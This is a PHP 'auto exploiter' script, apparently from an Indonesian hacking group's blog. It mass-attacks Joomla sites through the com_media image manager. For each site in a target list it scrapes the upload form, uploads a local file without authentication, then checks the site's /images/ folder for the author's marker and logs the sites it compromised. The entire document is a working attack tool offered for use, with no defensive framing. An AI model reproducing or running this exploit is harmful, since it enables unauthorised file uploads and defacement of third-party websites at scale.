Auto Exploiter Com_media

1. <?php
2. // Tu5b0l3d -IndoXploit-
3. // http://blog.indoxploit.or.id/2016/05/auto-exploiter-commedia.html
4.  
5. error_reporting(0);
6.  
7. function save($aso){
8.         $fp = @fopen("hasil_new5.htm", "a") or die("cant open file");
9.         fwrite($fp, $aso);
10.         fclose($fp);
11. }
12. if($argv[1] != ""){
13. $nama = $argv[1];
14. $buka=fopen("$nama","r");
15. $size=filesize("$nama");
16. $baca=fread($buka,$size);
17. $sites = explode("<br>", $baca);
18. $file = "k.txt";
19. foreach($sites as $sitesn){
20. $site = parse_url($sitesn, PHP_URL_HOST);
21. $urlq = "http://$site";
22. echo "$urlq\n";
23.  $ch4 = curl_init ("$urlq/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=");
24.                     curl_setopt ($ch4, CURLOPT_RETURNTRANSFER, 1);
25.                     curl_setopt ($ch4, CURLOPT_FOLLOWLOCATION, 1);
26.                     curl_setopt ($ch4, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
27.                     curl_setopt ($ch4, CURLOPT_SSL_VERIFYPEER, 0);
28.                     curl_setopt ($ch4, CURLOPT_SSL_VERIFYHOST, 0);
29.                     curl_setopt($ch4, CURLOPT_COOKIEJAR,'coker_log');
30.                 curl_setopt($ch4, CURLOPT_COOKIEFILE,'coker_log');
31.                
32.                     $data = curl_exec ($ch4);
33.                     curl_close($ch4);
34.  
35.                     preg_match("/<form action=\"(.*?)\" id=\"uploadForm\"/", $data, $action);
36.                     preg_match("/name=\"return-url\" value=\"(.*?)\"/", $data, $return);
37.                     $action = $action[1];
38.                     echo "$action\n";
39.                     echo "$return[1]\n";
40.  
41.  
42. $post = array("Filedata[]" => "@$file",
43.         "return-url" => "$return[1]",
44.            
45.             );
46.  
47.                    
48.                     $ch2 = curl_init ("$action");
49.                     curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
50.                     curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
51.                     curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
52.                     curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
53.                     curl_setopt ($ch2, CURLOPT_POST, 1);
54.                     curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
55.                     curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log');
56.                 curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log');
57.                     $data2 = curl_exec ($ch2);
58.                                    
59. curl_close($ch2);
60.  
61. $a = file_get_contents("$urlq/images/$file");
62. if(preg_match("/Tu5b0l3d/i", $a)){
63.     echo "Ok\n$urlq/images/$file\n\n";
64.     save("<a href='$urlq/images/$file'>$urlq/images/$file</a><br>");
65.    
66. }
67. else{
68.     echo "NO\n\n";
69. }
70. }
71. }
72. else{
73.     echo "usage php $argv[0] target.txt\n\n";
74. }
75. ?>